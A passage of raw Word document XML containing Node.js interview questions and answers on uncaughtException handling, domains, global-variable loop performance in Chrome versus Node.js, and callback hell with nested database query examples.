          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unhandled exceptions in Node.js can be caught at the Process level by attaching a handler for uncaughtException event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680CC2C" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16256A29" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069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console.log(`Caught exception: ${err}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346666E2" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069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5785CA96" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>However, uncaughtException is a very crude mechanism for exception handling and may be removed from Node.js in the future. An exception that has bubbled all the way up to the Process level means that your application, and Node.js may be in an undefined state, and the only sensible approach would be to restart everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9B834" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The preferred way is to add another layer between your application and the Node.js process which is called the </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>domain</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC8951" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Domains provide a way to handle multiple different I/O operations as a single group. So, by having your application, or part of it, running in a separate domain, you can safely handle exceptions at the domain level, before they reach the Process level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8CCDE1" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>However, domains have been </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>pending deprecation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> for a few years—since Node.js 4. It’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> a more future-proof approach would be to use </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>zones</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA91788" w14:textId="77777777" w:rsidR="0047069E" w:rsidRPr="00DA2F32" w:rsidRDefault="0047069E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C06A669" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consider following code snippet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062AF00D" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847D766" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.time(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"loop"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371F3221" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    for (var i </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0; i &lt; 1000000; i += 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3002B" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Do nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA45D7" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16293E" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    console.timeEnd(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"loop"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938E4B9" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB65B3" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc178383241"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The time required to run this code in Google Chrome is considerably more than the time required to run it in </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>Node.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. Explain why this is so, even though both use the v8 JavaScript Engine.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="1A7CDF44" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Within a web browser such as Chrome, declaring the variable i outside of any function’s scope makes it global and therefore binds it as a property of the window object. As a result, running this code in a web browser requires repeatedly resolving the property i within the heavily populated window namespace in each iteration of the for loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438DFB2F" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, however, declaring any variable outside of any function’s scope binds it only to the module’s own scope (not the window object) which therefore makes it much easier and faster to resolve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA1EDB" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It’s also worth noting that using let instead of var in the for loop declaration can reduce the loop’s run time by over 50%. But such a change assumes you know </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:anchor="question-527" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>the difference between let and var</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> and whether this will have an effect on the behavior of your specific loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC547E6" w14:textId="77777777" w:rsidR="0027667E" w:rsidRPr="00DA2F32" w:rsidRDefault="0027667E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38CD6E10" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc178383242"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is “callback hell” and how can it be avoided?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="0612B5CC" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“Callback hell” refers to heavily nested callbacks that have become unweildy or unreadable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4F80D" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>An example of heavily nested code is below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CD342"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query("SELECT clientId FROM clients WHERE clientName='picanteverde';", function(id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8137DC"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query(`SELECT * FROM transactions WHERE clientId=${id}`, function(transactions){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B48C532"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transactions.each((transac) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1EA94"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query(`UPDATE transactions SET value = ${transac.value*0.1} WHERE id=${transac.id}`, (error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2750FA52"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if(!error){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689FEB5C"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console.log("success!!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1524E0"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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78349A43"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console.log("error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150EE3F8"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74C5CA9"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478BA8BE"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3D569D9"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D4A8818"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53C786" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>At one point, the primary method to fix callback hell was </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>modularization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. The callbacks are broken out into independent functions which can be called with some parameters. So the first level of improvement might be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A5277"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const logError = (error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DAA9ED"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if(!error){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5A4F8"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console.log("success!!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E867697"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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780570B"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console.log("error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198392F"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7D6810A"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B21229E"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updateTransaction = (t) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139D3E6"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query(`UPDATE transactions SET value = ${t.value*0.1} WHERE id=${t.id}, logError);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028309DB"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81DCE3A"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handleTransactions = (transactions) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7D85B4"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transactions.each(updateTransaction);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F13E6"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222B194D"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handleClient = (id) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A766208"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query(`SELECT * FROM transactions WHERE clientId=${id}`, handleTransactions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9BBC8C" w14:textId="77777777" w:rsidR="00D663E6" w:rsidRPr="00DA2F32" w:rsidRDefault="00D663E6"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t>
      </w:r>
    </w:p>
